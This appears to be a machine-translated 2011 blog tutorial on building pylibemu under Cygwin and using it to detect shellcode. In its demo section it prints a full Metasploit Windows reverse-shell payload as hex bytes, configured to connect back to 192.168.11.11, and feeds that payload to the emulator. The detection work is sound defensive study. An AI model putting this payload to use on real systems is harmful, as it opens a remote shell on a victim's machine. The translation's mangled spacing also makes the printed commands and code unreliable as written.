Use python to detect shellcode

 

There is an inexplicable excitement when I see python. I personally think that the simpler programming, the better. Today, when IT staff are defined as 21 Century miners, the more code you write, the more resources you mine, but not the more valuable resources you mine. Moreover, many people in China are digging the remaining slag.

After reading a DVLabs article "Shellcode Detection Using Python", I started to practice it. Dvlabs said: "They collect a large number of files and documents. To identify these documents, they are malicious and require a lot of manual analysis, they wanted to use automated analysis to reduce the workload. One of the main ways to automate malicious document analysis is shellcode Detection, which checks whether the document contains shellcode ".

DVLabs mentioned two python-based shellcode detection tools: Pylibemu and Pylibscizzle.

Pylibemu encapsulates Libemu http://libemu.carnivore.it/to provide more functions without increasing the usage. One important function of Pylibemu is test (). This function shows the windows API information that shellcode calls.

 

Actual Pylibemu test:

Install Pylibemu. Download https://github.com/buffer/pylibemuand download libemu.

Git clone git: // git. carnivore. it/libemu. git

In windows, git can use msysgit (http://code.google.com/p/msysgit/downloads/list)

My test environment is windows 7. To use libemu on windows, Cygwin needs to be installed and the following packages are required:

-Gcc;

-Make;

-Automake;

-Libtool;

-Gettext-devel;

-Python

The downloaded libemu is placed in the specified directory. It is best to set the Cygwin environment variable in windows.

Add AC_CONFIG_MACRO_DIR ([m4]) to configure. ac. The content is as follows:

#-*-Mode: m4 ;-*-

#-*-Autoconf -*-

# Process this file with autoconf to produce a configure script.

# $ Id $

AC_CONFIG_MACRO_DIR ([m4])

AC_PREREQ (2.59)

....

 

Switch to the libemu directory under the Cygwin command line and enter autoreconf-v-I.

 

Delete the AC_CONFIG_MACRO_DIR ([m4]) added in configure. ac.

 

Enter./configure -- prefix =/opt/libemu in the Cygwin command line, and an error will be prompted:

Checking for cargos-lib.h... no

Configure: creating./config. status

. In 'ig. status: error: cannot find input file: 'makefile

 

Solution: first use notpad ++ to convert the configure file to windows format and save it. Convert the configure file and save it in linux format.

Run./configure -- prefix =/opt/libemu again

 

Run make and the following error occurs:

C0: warnings being treated as errors

Userhooks. c: In function 'append ':

Userhooks. c: 168: 3: error: array subscript has type 'Char'

Makefile: 365: recipe for target 'sctest-userhooks. o' failed

Make [3]: *** [sctest-userhooks.o] Error 1

Make [3]: Leaving directory '/cygdrive/f/linux/libemu/tools/sctest'

Makefile: 264: recipe for target 'all-records' failed

Make [2]: *** [all-recursive] Error 1

Make [2]: Leaving directory '/cygdrive/f/linux/libemu/tools'

Makefile: 353: recipe for target 'all-records' failed

Make [1]: *** [all-recursive] Error 1

Make [1]: Leaving directory '/cygdrive/f/linux/libemu'

Makefile: 260: recipe for target 'all' failed

Make: *** [all] Error 2

 

Solution: Modify the 168 behavior of userhooks. c under the tools \ sctest directory.

If (isprint (int) data [I]) // | isblank (data [I])

 

Run make install www.2cto.com

Running build

Running build_ext

 

Decompress Pylibeum to the specified directory and run the Cygwin command line.

Run python setup. py build

Running build

Running build_ext

 

Run python setup. py install

Running install

Running build

Running build_ext

Building 'pylibemu' extension

...

Copying build/lib. cygwin-1.7.9-i686-2.6/pylibemu. dll->/usr/lib/python2.6/site-packages

Running install_egg_info

Writing/usr/lib/python2.6/site-packages/pylibemu-0.1.4-py2.6.egg-info

After successful installation, run python in cygwin and enter the python interactive command line.

Import pylibemu

The tragedy happened and the following error was prompted:

>>> Import pylibemu

Traceback (most recent call last ):

File "<stdin>", line 1, in <module>

ImportError: No such file or directory

It took me nearly one afternoon to solve this problem. In fact, many python installation packages will encounter this problem in cygwin. if you carefully view the installation information of pylibemu, you will find that, pylibemu only writes pylibemu-0.1.4-py2.6.egg-info and pylibemu to the site-packages directory. dll file, that is, the object file only has pylibemu. dll, finally found a related article through google, the author said that for the cygwin python module only dll No such file or directory, the reason may be that dll cannot be loaded, after a careful look at ImportError, the system prompts that the file or directory does not exist, rather than the module does not exist.

Run cygcheck.exe/usr/lib/python2.6/site-packages/pylibemu. dll

The following error is prompted:

F: \ cygwin \ lib \ python2.6 \ site-packages \ pylibemu. dll

Cygcheck: track_down: cocould not find cygemu-2.dll

 

The original is unable to find the cygemu-2.dll, resulting in pylibemu. dll cannot be loaded. Cygemu-2.dll is the libemu file compiled under cygwin, the file in the/opt/libemu/bin directory, may be that I did not add environment variables, I Have To Do not add environment variables, but the cygemu-2.dll to the cygwin bin directory under a copy.

The problem of running import pylibemu in python environment is successfully solved.

 

Demo:

Use metasploit to generate a reverse shellcode

Msf> use windows/shell_reverse_tcp

Msf payload (shell_reverse_tcp)> set LHOST 192.168.11.11

LHOST => 192.168.11.11

Msf payload (shell_reverse_tcp)> generate-t ruby

 

 

View sourceprint? 01 # windows/shell_reverse_tcp-314 bytes

 

# Http://www.metasploit.com

 

03 # VERBOSE = false, LHOST = 192.168.11.11, LPORT = 4444,

 

04 # ReverseConnectRetries = 5, EXITFUNC = process,

 

05 # InitialAutoRunScript =, AutoRunScript =

 

06 buf = "\ xfc \ xe8 \ x89 \ x00 \ x00 \ x00 \ x60 \ x89 \ xe5 \ x31 \ xd2 \ x64 \ x8b \ x52"

 

07 + "\ x30 \ x8b \ x52 \ x0c \ x8b \ x52 \ x14 \ x8b \ x72 \ x28 \ x0f \ xb7 \ x4a \ x26"

 

08 + "\ x31 \ xff \ x31 \ xc0 \ xac \ x3c \ x61 \ x7c \ x02 \ x2c \ x20 \ xc1 \ xcf \ x0d"

 

09 + "\ x01 \ xc7 \ xe2 \ xf0 \ x52 \ x57 \ x8b \ x52 \ x10 \ x8b \ x42 \ x3c \ x01 \ xd0"

 

10 + "\ x8b \ x40 \ x78 \ x85 \ xc0 \ x74 \ x4a \ x01 \ xd0 \ x50 \ x8b \ x48 \ x18 \ x8b"

 

11 + "\ x58 \ x20 \ x01 \ xd3 \ xe3 \ x3c \ x49 \ x8b \ x34 \ x8b \ x01 \ xd6 \ x31 \ xff"

 

12 + "\ x31 \ xc0 \ xac \ xc1 \ xcf \ x0d \ x01 \ xc7 \ x38 \ xe0 \ x75 \ xf4 \ x03 \ x7d"

 

13 + "\ xf8 \ x3b \ x7d \ x24 \ x75 \ xe2 \ x58 \ x8b \ x58 \ x24 \ x01 \ xd3 \ x66 \ x8b"

 

14 + "\ x0c \ x4b \ x8b \ x58 \ x1c \ x01 \ xd3 \ x8b \ x04 \ x8b \ x01 \ xd0 \ x89 \ x44"

 

15 + "\ x24 \ x24 \ x5b \ x5b \ x61 \ x59 \ x5a \ x51 \ xff \ xe0 \ x58 \ x5f \ x5a \ x8b"

 

16 + "\ x12 \ xeb \ x86 \ x5d \ x68 \ x33 \ x32 \ x00 \ x00 \ x68 \ x77 \ x73 \ x32 \ x5f"

 

17 + "\ x54 \ x68 \ x4c \ x77 \ x26 \ x07 \ xff \ xd5 \ xb8 \ x90 \ x01 \ x00 \ x00 \ x29"

 

18 + "\ xc4 \ x54 \ x50 \ x68 \ x29 \ x80 \ x6b \ x00 \ xff \ xd5 \ x50 \ x50 \ x50 \ x50"

 

19 + "\ x40 \ x50 \ x40 \ x50 \ x68 \ xea \ x0f \ xdf \ xe0 \ xff \ xd5 \ x89 \ xc7 \ x68"

 

20 + "\ xc0 \ xa8 \ x0b \ x0b \ x68 \ x02 \ x00 \ x11 \ x5c \ x89 \ xe6 \ x6a \ x10 \ x56"

 

21 + "\ x57 \ x68 \ x99 \ xa5 \ x74 \ x61 \ xff \ xd5 \ x68 \ x63 \ x6d \ x64 \ x00 \ x89"

 

22 + "\ xe3 \ x57 \ x57 \ x57 \ x31 \ xf6 \ x6a \ x12 \ x59 \ x56 \ xe2 \ xfd \ x66 \ xc7"

 

23 + "\ x44 \ x24 \ x3c \ x01 \ x01 \ x8d \ x44 \ x24 \ x10 \ xc6 \ x00 \ x44 \ x54 \ x50"

 

24 + "\ x56 \ x56 \ x56 \ x46 \ x56 \ x4e \ x56 \ x56 \ x53 \ x56 \ x68 \ x79 \ xcc \ x3f"

 

25 + "\ x86 \ xff \ xd5 \ x89 \ xe0 \ x4e \ x56 \ x46 \ xff \ x30 \ x68 \ x08 \ x87 \ x1d"

 

26 + "\ x60 \ xff \ xd5 \ xbb \ xf0 \ xb5 \ xa2 \ x56 \ x68 \ xa6 \ x95 \ xbd \ x9d \ xff"

 

27 + "\ xd5 \ x3c \ x06 \ x7c \ x0a \ x80 \ xfb \ xe0 \ x75 \ x05 \ xbb \ x47 \ x13 \ x72"

 

28 + "\ x6f \ x6a \ x00 \ x53 \ xff \ xd5"

 

 

Python test code:

 

 

View sourceprint? 01 #! /Usr/bin/python

 

02 import pylibemu

 

03 shellcode = ("\ xfc \ xe8 \ x89 \ x00 \ x00 \ x00 \ x60 \ x89 \ xe5 \ x31 \ xd2 \ x64 \ x8b \ x52"

 

04 + "\ x30 \ x8b \ x52 \ x0c \ x8b \ x52 \ x14 \ x8b \ x72 \ x28 \ x0f \ xb7 \ x4a \ x26"

 

05 + "\ x31 \ xff \ x31 \ xc0 \ xac \ x3c \ x61 \ x7c \ x02 \ x2c \ x20 \ xc1 \ xcf \ x0d"

 

06 + "\ x01 \ xc7 \ xe2 \ xf0 \ x52 \ x57 \ x8b \ x52 \ x10 \ x8b \ x42 \ x3c \ x01 \ xd0"

 

07 + "\ x8b \ x40 \ x78 \ x85 \ xc0 \ x74 \ x4a \ x01 \ xd0 \ x50 \ x8b \ x48 \ x18 \ x8b"

 

08 + "\ x58 \ x20 \ x01 \ xd3 \ xe3 \ x3c \ x49 \ x8b \ x34 \ x8b \ x01 \ xd6 \ x31 \ xff"

 

09 + "\ x31 \ xc0 \ xac \ xc1 \ xcf \ x0d \ x01 \ xc7 \ x38 \ xe0 \ x75 \ xf4 \ x03 \ x7d"

 

10 + "\ xf8 \ x3b \ x7d \ x24 \ x75 \ xe2 \ x58 \ x8b \ x58 \ x24 \ x01 \ xd3 \ x66 \ x8b"

 

11 + "\ x0c \ x4b \ x8b \ x58 \ x1c \ x01 \ xd3 \ x8b \ x04 \ x8b \ x01 \ xd0 \ x89 \ x44"

 

12 + "\ x24 \ x24 \ x5b \ x5b \ x61 \ x59 \ x5a \ x51 \ xff \ xe0 \ x58 \ x5f \ x5a \ x8b"

 

13 + "\ x12 \ xeb \ x86 \ x5d \ x68 \ x33 \ x32 \ x00 \ x00 \ x68 \ x77 \ x73 \ x32 \ x5f"

 

14 + "\ x54 \ x68 \ x4c \ x77 \ x26 \ x07 \ xff \ xd5 \ xb8 \ x90 \ x01 \ x00 \ x00 \ x29"

 

15 + "\ xc4 \ x54 \ x50 \ x68 \ x29 \ x80 \ x6b \ x00 \ xff \ xd5 \ x50 \ x50 \ x50 \ x50"

 

16 + "\ x40 \ x50 \ x40 \ x50 \ x68 \ xea \ x0f \ xdf \ xe0 \ xff \ xd5 \ x89 \ xc7 \ x68"

 

17 + "\ xc0 \ xa8 \ x0b \ x0b \ x68 \ x02 \ x00 \ x11 \ x5c \ x89 \ xe6 \ x6a \ x10 \ x56"

 

18 + "\ x57 \ x68 \ x99 \ xa5 \ x74 \ x61 \ xff \ xd5 \ x68 \ x63 \ x6d \ x64 \ x00 \ x89"

 

19 + "\ xe3 \ x57 \ x57 \ x57 \ x31 \ xf6 \ x6a \ x12 \ x59 \ x56 \ xe2 \ xfd \ x66 \ xc7"

 

20 + "\ x44 \ x24 \ x3c \ x01 \ x01 \ x8d \ x44 \ x24 \ x10 \ xc6 \ x00 \ x44 \ x54 \ x50"

 

21 + "\ x56 \ x56 \ x56 \ x46 \ x56 \ x4e \ x56 \ x56 \ x53 \ x56 \ x68 \ x79 \ xcc \ x3f"

 

22 + "\ x86 \ xff \ xd5 \ x89 \ xe0 \ x4e \ x56 \ x46 \ xff \ x30 \ x68 \ x08 \ x87 \ x1d"

 

23 + "\ x60 \ xff \ xd5 \ xbb \ xf0 \ xb5 \ xa2 \ x56 \ x68 \ xa6 \ x95 \ xbd \ x9d \ xff"

 

24 + "\ xd5 \ x3c \ x06 \ x7c \ x0a \ x80 \ xfb \ xe0 \ x75 \ x05 \ xbb \ x47 \ x13 \ x72"

 

25 + "\ x6f \ x6a \ x00 \ x53 \ xff \ xd5 ")

 

26 emulator = pylibemu. Emulator ()

 

27 emulator. prepare (shellcode, 1)

 

28 emulator. test ()

 

29 print emulator. emu_profile_output

 

 

Result:

HMODULE LoadLibraryA (

LPCTSTR = 0x00c3c590 =>

= "Ws2_32 ";

) = 1906376704;

In fact, pylibemu can execute dynamic shellcode. It is not ideal to check whether shellcode exists in the document. Pylibscizzle is better than it in this respect. Next, we will introduce Pylibscizzle and compare it with pylibemu in shellcode Detection.

Author: wpulog

Data: 2011/12/27

 

Reference: http://dvlabs.tippingpoint.com/blog/2011/12/05/shellcode-detection-python